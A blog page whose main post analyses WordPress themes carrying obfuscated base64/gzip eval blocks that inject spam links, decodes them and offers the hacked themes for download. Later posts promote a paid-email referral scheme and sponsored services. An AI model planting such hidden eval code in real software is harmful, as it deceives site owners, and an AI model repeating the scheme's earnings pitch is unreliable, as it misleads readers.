Chaos Laboratory

While I was away on my sabbatical (read coping with the all-new fatherhood), I occasionally managed to catch a glimpse of the latest action dramas unfolding on the net – primarily because the WordPress dashboard made it a point to present them to me on a daily basis. One of them caught my fancy and I decided to take a deeper look. The topic was Technorati & hacked WordPress blogs. More than Technorati, it was the article on Weblog Tools Collection that got me wondering…

The premises

While I had made it a point to keep abreast with the WordPress releases and firmly believed that my blog wasn’t affected by this, I wasn’t quite so sure about a couple of other blogs that I had installed for my friends / clients. Going through a few of them, I noticed that all of them had a profuse amount of random & unrelated links in their footer besides containing links to a group of common sites in their blogroll. While the footer links were more or less random (and still acceptable), I couldn’t believe that, strangers as they were, all my friends & clients had managed to put their heads together and point to the same group of sites! Naturally, I got asking and found out that none of them had ever added those links in person and that even they were confused as to where they came from. Being new to blogging most of them had taken it for granted that those links were a part of the WordPress ring and had been placed there as a reciprocating gesture for providing such a terrific blogging platform for free.

The investigation

My first step was to dig into the file footer.php, where I encountered this strange sequence of code. Here’s an example…

< ?php $Gdb63b0c686622a27d0bdb237219e0e96='jZNNa9wwEIbPXch/
mOqyG4gt2mPr1UI/oL0tSUmPRmvP2iK2pGrGawz98ZW/NhAaWl9kj2ae9
52xdFCZLM1F3WyyuEDRaKK9KBrUQTxv/WONb6atgEKxF9nB1x5OjauMP
bvdlrH1jWbMSxOwYBeG7e1HOChpWl0hybNzjCH1thKgG96LOSBWK+un
XC2a8hpUcLMByN4mCXw/w+C6bQmNeUJgB9R57wLDTxfKY0CiO6j1xdg
KuEYQ3vUYsITTIGKJfQJyLfZ1jEGSqCvW2REbpn7A0FR7QmLo9XAHhrcE
47azzQA+uNaxiSUugC4vGNhQFExhelasV1+QTGWj+KcBMg11wPNe1Mz
+g5R936cXXeiREzAOZEgL18rOGsYyIY6TJFnrXhsj1LdpnYYA8LhUwT1a
1g1lUitI4Lg0GrXGUfhxFDH8o8YW4RjcxZSvOFmzeUyltMdxCJR2JNQzaeL
MWrON5D9bEupvhrNTUDPnSnl5oALR+7wLzXyMhPpqORgk2N0/PNxOR
n6/XhyF26hG+UvK52Vj6eIKSzPpo6M38bfNLCxqBxVybrs2/9XhqL2bILB
8pTBnsmkx5MTO797NCYSFsyUtzOstmrJ7n8+neoZNl0qeXDlMmTW3zW
xg8wc=';
eval(gzinflate(base64_decode($Gdb63b0c686622a27d0bdb237219e0e96))); ?>

Looks scary, doesn’t it? Managed to give me a fright at the first sight too. Whereas, I was expecting a bunch of hard-coded links, you get this!! Fear not. A second glance will tell you that the code isn’t really as mambo-jambo-ish as it looks. It contains 2 distinct php statements. The first one is simply the assignment of the scrambled sequence of characters to a horribly named variable i.e. $Gdb63b0c686622a27d0bdb237219e0e96.

< ?php $Gdb63b0c686622a27d0bdb237219e0e96='jZNNa9wwEIbPXch/
mOqyG4gt2mPr1UI/oL0tSUmPRmvP2iK2pGrGawz98ZW/NhAaWl9kj2ae9
52xdFCZLM1F3WyyuEDRaKK9KBrUQTxv/WONb6atgEKxF9nB1x5OjauMP
bvdlrH1jWbMSxOwYBeG7e1HOChpWl0hybNzjCH1thKgG96LOSBWK+un
XC2a8hpUcLMByN4mCXw/w+C6bQmNeUJgB9R57wLDTxfKY0CiO6j1xdg
KuEYQ3vUYsITTIGKJfQJyLfZ1jEGSqCvW2REbpn7A0FR7QmLo9XAHhrcE
47azzQA+uNaxiSUugC4vGNhQFExhelasV1+QTGWj+KcBMg11wPNe1Mz
+g5R936cXXeiREzAOZEgL18rOGsYyIY6TJFnrXhsj1LdpnYYA8LhUwT1a
1g1lUitI4Lg0GrXGUfhxFDH8o8YW4RjcxZSvOFmzeUyltMdxCJR2JNQzaeL
MWrON5D9bEupvhrNTUDPnSnl5oALR+7wLzXyMhPpqORgk2N0/PNxOR
n6/XhyF26hG+UvK52Vj6eIKSzPpo6M38bfNLCxqBxVybrs2/9XhqL2bILB
8pTBnsmkx5MTO797NCYSFsyUtzOstmrJ7n8+neoZNl0qeXDlMmTW3zW
xg8wc=';

This statement alone didn’t make much sense though. It was the second statement, with it’s share of nested functions, that started shedding light on the whole issue…

eval(gzinflate(base64_decode($Gdb63b0c686622a27d0bdb237219e0e96)));

If you’re familiar with php even a bit, you’ll begin to realise that this statement decodes whatever nastiness is lurking in the first line and helps executing it using the eval() statement. Prior to that, the code has been base64 encoded (the same encoding that is applied to email attachments) and then gzipped – if you follow the order of decoding.

To really get behind the mystery code, you need to be able to SEE it. Rather simple. Just replace the eval() statement with an echo and it’ll spit the code out onto your screen instead of executing it. Following that, we modify the code block to look like this…

< ?php $Gdb63b0c686622a27d0bdb237219e0e96='jZNNa9wwEIbPXch/
mOqyG4gt2mPr1UI/oL0tSUmPRmvP2iK2pGrGawz98ZW/NhAaWl9kj2ae9
52xdFCZLM1F3WyyuEDRaKK9KBrUQTxv/WONb6atgEKxF9nB1x5OjauMP
bvdlrH1jWbMSxOwYBeG7e1HOChpWl0hybNzjCH1thKgG96LOSBWK+un
XC2a8hpUcLMByN4mCXw/w+C6bQmNeUJgB9R57wLDTxfKY0CiO6j1xdg
KuEYQ3vUYsITTIGKJfQJyLfZ1jEGSqCvW2REbpn7A0FR7QmLo9XAHhrcE
47azzQA+uNaxiSUugC4vGNhQFExhelasV1+QTGWj+KcBMg11wPNe1Mz
+g5R936cXXeiREzAOZEgL18rOGsYyIY6TJFnrXhsj1LdpnYYA8LhUwT1a
1g1lUitI4Lg0GrXGUfhxFDH8o8YW4RjcxZSvOFmzeUyltMdxCJR2JNQzaeL
MWrON5D9bEupvhrNTUDPnSnl5oALR+7wLzXyMhPpqORgk2N0/PNxOR
n6/XhyF26hG+UvK52Vj6eIKSzPpo6M38bfNLCxqBxVybrs2/9XhqL2bILB
8pTBnsmkx5MTO797NCYSFsyUtzOstmrJ7n8+neoZNl0qeXDlMmTW3zW
xg8wc=';
echo gzinflate(base64_decode($Gdb63b0c686622a27d0bdb237219e0e96));
?>

Save this code in a new php file and execute it from your local php-enabled web-server installation (in my case XAMPP) and here’s what you get…

  
  

Designed By Hawaii
    Vacation Rentals - Powered By WordPress - Theme Provided By WordPress Themes
    - Vacation Rentals

    Entries (RSS) | Comments
    (RSS).

< ?php echo get_num_queries(); ?> queries. < ?php timer_stop(1); ?> seconds.

< ?php wp_footer(); ?>

Pretty much, the kind of code you’d expect in a WordPress theme footer. While one can accept the link to http://wordpressthemes.weblogs.us as the default link to the theme hosting service, I couldn’t understand what Vacation Reality had to do with it. Still, so much for the footer. All I had to do now, was to remove the whole block of code and create a clean footer as specified by my clients.

The second complaint was regarding those common links that kept appearing in the blogroll. As it turned out, some of my clients had tried deleting those links only to have them re-appear a couple of hours down the line. Time to investigate again. This time it was the file, functions.php. Didn’t have to look far. A search for the terms eval andbase64 got me to the desired point. Once again I faced a block of code that went like…

< ?php }
$Q0d299dceb2cb08cb71bfbc1414b1505a='hZBBawIxEIXPm18xDAUTsN
pzZb3ISg9tBbvFY4gmajCbhCTbUMT/3m6qpx68DTPfvPdmiJCSi13SzlJUUi
fuXUw4Rm2jComno+oUN9qekM3IvrcFhX9TyuBMqoNxW2HgIXu5nZFK72k
pH+cHlfiXCBQ/mtdm0cJi9fne0mGRa8lguV69wRUdmhE2L826gQL0wdSjY0r
+eTrNOU+yC9IHFWPsvTdaxcnOdSNkdf3ESFVlz6/pSi4RgvimWJSs6BRCPQ
fc3DSgHU6IOAa8mf0R9wwR2O9DLuQH';
eval(gzinflate(base64_decode($Q0d299dceb2cb08cb71bfbc1414b1505a)));
?>

Taking the same road as the first time fetched me this very interesting block of code..

add_action("edit_post","insert_theme_link");
function insert_theme_link() {
    global $wpdb;
    if($wpdb->get_var("SELECT COUNT(link_id) FROM $wpdb->links WHERE link_url='http://www.wordpresssupplies.com'")==0)
        wp_insert_link(array("link_name" => "Wordpress Themes", "link_url" => "http://www.wordpresssupplies.com" ));
}

The code should be fairly self-explanatory. What we have is a function named insert_theme_link that adds a link to wordpresssupplies.com to your blogroll (contained in the table wp_links in the WordPress database), if the link isn’t present. The noteworthy line here is add_action( "edit_post","insert_theme_link" ).

The add_action function is a plug-in API hook for WordPress.

• The first parameter dictates which WordPress action to hook or watch out for.
• The second parameter is the name of the function that is called when the hooked action occurs.

In our case, the action is edit_post, i.e. whenever the blog author edits a post, the function that adds the link to the blogroll is executed. Hence the mysteriously re-appearing link !

The nexus

Hot on the track, I decided to follow the link that was being injected here.. i.e. wordpresssupplies.com – just to make sure this wasn’t a random case and I am not tarnishing their reputation anyhow by unjustifiably pointing fingers at them. I dropped by their site and picked 3-4 themes from different categories. And what do I find? Every single one of them contained similar code – both in the footer as well as the functions.php. Not just that – studying the links led me to two other sites teeming with hacked themes. For your convenience (and warning) I’m listing them here.

• http://www.amazingwordpressthemes.com/
• http://wordpressthemes.weblogs.us/

All of them are nicely decked-up and look like legit. WordPress theme sites. But be wary of any themes that you download and use from these sites for they’re certain to contain such code blocks. Apart from these links, you may also notice some other random links being injected – links to car loan sites, cheap dedicated servers etc. – shady businesses which have probably paid the hacked theme sites to insert their links and thus gain PR (pagerank) out of millions of unsuspecting sites utilising these themes.

I tried doing WHOIS on these domains, but that’s where I met-up with a wall. They’re either cloaked with Privacy Protect or contain spurious information regarding their owners. But I have a feeling that under the hood, these spammers (I prefer the term spammers here to hackers – as the people who’ve injected this code into the theme are nothing but link spammers) belong to the same group or it’s the work of a lone individual.

The Philippino blogger Yuga, outlines a couple of other methods followed by these spammers to capture / break your WordPress installation. The article is a must read.

The conclusion

On a sidenote, these themes can still be used if you carefully snip the spammy code out. Normally, the code-block in functions.php can be entirely eliminated without affecting the theme at all. As for the ones in footer.php, you’ll have to study the underlying code and eliminate the links to these sites, keeping the rest.

For those who want to experiment with such themes, I’m listing a few here for direct downloads. Disabling these themes or switching to another one will (normally) get rid of the injector code – but even then, USE AT YOUR OWN RISK.

Downloads

Emerald Waters (Hacked)  (227.0 KiB, 275 downloads)

Elegance (Hacked)  (501.7 KiB, 266 downloads)

Graytone (Hacked)  (81.9 KiB, 276 downloads)

If you manage to dig-up any other hacked theme sites like these, make sure you leave a comment enlisting them. It’ll serve as a warning note to all those who read this. And of course, if you have any thoughts to share on this issue, feel free…

May 26th by miCRoSCoPiC^eaRthLinG

Continue Reading

An average internet user comes across plenty of Get Rich Quick schemes floating around on the net. Almost all of these lure members in with promises of delivering an insane amount of riches in just 3-4 days while you just sit at your computer building up your referral list. You’ll notice something strangely similar about their advertising methods – all of them put substantial emphasis on words & phrases like FREE, FASTEST MONEY MAKING MACHINE EVER, LIVE A DREAM LIFE EVER AFTER etc. and denounce all others in this business. Reading their income outline compels many of us to rush head on and sign-up immediately. Unfortunately it doesn’t take long to realise that this “dream opportunity” isn’t really all that free as it claims to be. to get any real advantages out of it you’ve to build a massive list of referrals / affiliates and pay a monthly membership fee in order to gain any real benefits out of your down-line. The monthly payment part is what most of these services very conveniently forget to mention in their advertisements. Ah well !

I had played around with a lot of these online money makers before I launched this blog (and started earning advertisement revenue). These schemes operate on the principles of MLM (Multi Level Marketing) or Network Marketing – which means that in order to make some serious money you need to have a large networked down-line. Initially you can always lure others into signing up through similar advertisements. But when it comes to fishing out cash from their own pockets you’ll find a lot of your down-line vanishing into thin air overnight – coz it’s evident to everyone that there’s no guarantee that the scheme would work as advertised. Why waste hard-earned money of such a thing? While I am still interested in making those few extra bucks online – I’ve lost faith in all such schemes long since.

In comes Hits4Pay. I found this site through an AdBrite advertisement that popped up on my site. The catch-phrase sounded interesting but I was quite apprehensive about it. Anyway, there was no harm in spending a couple of second signing-up for it – so I went ahead with it. To my surprise this turned out to be the first ever scheme that doesn’t ask you to shell out anything from your pockets. You pay absolutely nothing for a membership with them – and never need to pay anything for upgrades either.

Hits4Pay operates on a much simpler principle. While signing-up you choose a bunch of topics that you’re interested in. They’ll keep sending you emails from advertisers about 2-3 times a week. To read the emails, you’ll need to log in to your Hits4Pay account and check your inbox. Once you’ve read the mails, your account gets credited with $0.02 – that is you receive 2 cents for every email you read. Admittedly this isn’t a big amount – but then again, this isn’t a get rich quick scheme either. There’s a scope to earn more by building a down-line. For every email read by your affiliates (1st and 2nd level), you receive $0.01. Having a large down-line can really boost your income – so that’s the only area you need to concentrate on.

What more – as of now they’re offering a $10 sign-up bonus. Your account gets padded with $10 the moment you sign-up and all emails you read after that goes towards topping up that amount. Payouts happen for as low as $25 and get sent directly to your PayPal account.

Here are the key features:

• Free Sign-up
• $10 bonus for just signing up
• No membership / upgradation fees ever
• Receive paid emails on topics that you choose
• No spamming
• A flat income of $0.02 per email you read
• Earn $0.01 from every email read by your 1st and 2nd level down-lines
• Minimum Payout $25
• Payouts occur instantly through PayPal
• Only limitation – 1 account per household

That more or less summarises the idea. If you’re interested in making some extra cash online, this could definitely be the scheme you’re looking for.

Instead of reading commercial emails for free receive emails on topics that interests you and Get Paid For It! Hits4Pay is one of very few highest paying advertising program in the industry.

Signup for free and receive $10 as a Free Reward.

Sep 26th by miCRoSCoPiC^eaRthLinG

Continue Reading

FeedBurner Email Subscriptions are a great way to spread your blog’s content far & wide – by sending your post feeds directly to the inbox of your subscribers. It’s a particularly viable option for the subscribers who don’t want to get into the hassle of firing up their feed reader every day. Quite a few of my regular subscribers utilise this method.

I’ve always kept a tab on each my feeds using a standard feed reader (FeedReader) and since they appeared fine to me I never really bothered to check on the email based feeds. Recently, I received a bunch of complaints from the email subscribers regarding “broken images” in the emails. Doing a quick check confirmed the reports – the images embedded in the posts were indeed missing. Instead they are replaced by the standard “broken image” icon. It took me a while to figure out the real problem – since the same feed(s) turned up just fine in any given feed reader.

The Problem

The root of the problem lies in how one embeds images and/or links in the posts – i.e. in the absolute or relative URL formats. To save up on typing, I’ve always resorted to relative URLs when specifying the source of the images in my posts. This actually is a good practise since this enables you to transfer your site to another domain without any ensuing hiccups over broken links and images. However, this doesn’t always translate properly in case of RSS/Atom feeds. The best thing to do in such cases is to use absolute URLs – so that the images in the feeds get displayed properly when they are viewed independently of the site or even when incorporated in someone else’s site.

As for me, I don’t follow the standardised WordPress approach of uploading all the images under the /wp-content/uploads/ directory. I have my own folder called /postimage/ where I manually upload the pictures and then link them in the relative format. For example, /postimage/image_file.jpg.

When my site is viewed directly in a browser or through a feed reader, the images are automatically located in relation to the site root, i.e. http://chaos-laboratory.com and thus displayed properly. For emailed feeds, the image source attributes get converted to http://postimage/image_file.jpg – which naturally doesn’t make any sense to your browser.

The Solution

Your best bet out here, is to device some mechanism where you can still use the relative URLs in your posts – but they automatically get translated to the absolute form (inclusion of your domain name before the folder and file information) in case of feeds.

The first method involves some messy editing of the WordPress feed publishing files (found in the /wp-includes/ folder). In any standard WordPress installation, they’re the PHP files starting with the word feed (feed-atom.php, feed-rss2.php etc). You can edit these files and implement Regular Expression matching routines to replace any relative links with the absolute form. This is more of a pro-coder approach.

The second method is to use a readily available WordPress plug-in named URL Absolutifier which works in a similar way – but translates all your relative URLs to their absolute forms for both your site and feeds. This is the approach I’ve taken up for the time being. Currently I am testing out this plug-in and will report my findings shortly. If it manages to fix my problem, I’ll try and implement the code directly into the feed publishing engine (mentioned in the first method).

Any thoughts on this ?

Sep 17th by miCRoSCoPiC^eaRthLinG

Continue Reading

Do you always keep worrying about your beloved pet while at office? Has the thought of someone breaking into your home started affecting you work? Wouldn’t it be lovely if you had a way of keeping a constant vigilance on your home and be at peace of mind every time you are away?

Now, if you are willing to utilise the technological edge there are plenty of solutions which can help you out in this. And HomeCamera – which is a recent entrant in this field – happens to do just that. It’s a simple, easy-to-setup service that offers you complete remote monitoring facilities for free. No extra (and fancy) equipment required other than a normal webcam. In fact, with this aptly titled home camera based solution you can hook up as many webcams as you like and monitor every square-inch on your house. On the move and don’t have a net connection at hand? No problem with that either. You can share you camera feeds with any of your trusted buddies and let them take over the monitoring task for a while. HomeCamera offers an archive section, in case you ever need to go back and check on any of the earlier feeds. All of this is accessible from any corner of the world using a standard browser. Here’s a screen-shot of their web-interface.

Registration with this service is free and requires only a couple of steps. You need to have a valid email address for this. Once registered you’ll have to download their client software, install and enter your registration details in it and you’re good to go. The client auto-detects all the webcams you’ve got attached to your computer and lists them for your convenience. You can assign names & descriptions to each -which show up in the web-interface next time you login. There’s a pretty slick & accurate motion detection feature that automatically turns on the recording whenever there’s some moving object in the camera’s focal cone. That way you don’t waste valuable disk space or bandwidth by sending out a continuous video stream. You can even specify the length (duration) of each footage that is to be sent out to the HomeCamera server. Cool thing is that the recording isn’t limited to videos – it’s also possible to send out snapshots (pictures). Here’s a screen-shot that shows the motion detection in action. I tilted my head just a little bit and you can see the detection frame zeroing in on that region.

The motion detection feature also sends out alerts to your email address and mobile phone (if you choose to) along with a link which directly takes you to the video footage. The mobile messaging part is possibly the only feature which doesn’t come for free. When you sign-up first, you start with 25 mobile credits but you’ll have to purchase additional credits once you exhaust these.

Alternatively, you can disable motion detection and specify an interval (say 10 minutes) at which the footages are sent out on a regular basis. This is called time-lapse recording.

Another big plus point is that HomeCamera virtually works with any given webcam. It also works most CCTV and wi-fi cameras.

As of now, HomeCamera is in it’s open public BETA stage and if you sign-up as a beta tester you automatically qualify for a free lifetime subscription to the HomeCamera Lite service. Moreover, all beta testers are eligible for special subscription rates for various HomeCamera services in future.

I’ve tested out this service thoroughly and as of now they seem to deliver every bit of their promise. This is a far more viable alternative to all the expensive hardware based monitoring systems available in the market. I highly recommend signing up for a beta trial. You can always take a tour of their site/services before you decide on signing up.

As a footnote I’d like to add that while this is a sponsored post, the views expressed here are entirely unbiased and based on personal experience of this service. In fact I’d been explicitly instructed by HomeCamera to express fair and impartial views.

Sep 11th by miCRoSCoPiC^eaRthLinG

Continue Reading

Gmail, Yahoo, Hotmail – whichever email provider you may be using, the size of attachments is always capped to typically 10MB per file and to a total of around 20MB in a single email. Your only workaround is to keep the file sizes within the limit or tediously break up a large file into multiple parts and expect the recipient to join them back again. This can prove to be a productivity killer specially when you’ve to send in a bunch of files.

Driveway, an online file sharing service, now offers you a simple workaround for this. Parkit^TM is a new method of sending in up to 500MB of attachments with each of your mails – simply upload your file to Driveway and send in the Parkit link along with your email. Keep in mind that the 500MB cap is applicable for a single file only – there’s virtually no limit to the amount of data you can upload or download from this service.

Another USP (Unique Selling Proposition) for Driveway is their patent-pending Edit Widgets technology with which you can modify the uploaded documents directly from you computer without having to go through the modify-reupload-resend cycle every time you need to mail a change to everyone in your group. And you can do this directly from your Windows desktop. Currently editable formats are .doc, .xls and .ppt.

Driveway also lets you create embeddable web-widgets with which you can share your files directly through a web-page or a blog. The widgets can stream Flash & FLV movies, MP3 audios or simply display interactive slideshows of your photos (any standard picture format) directly on your site. No additional downloads are required.

If “Size really does matter” for you, without any doubts this is the service you’re looking for.

Incidentally, Driveway is brought to you by the excellent hands-free online backup system called IDrive-E.

Sep 03rd by miCRoSCoPiC^eaRthLinG

Continue Reading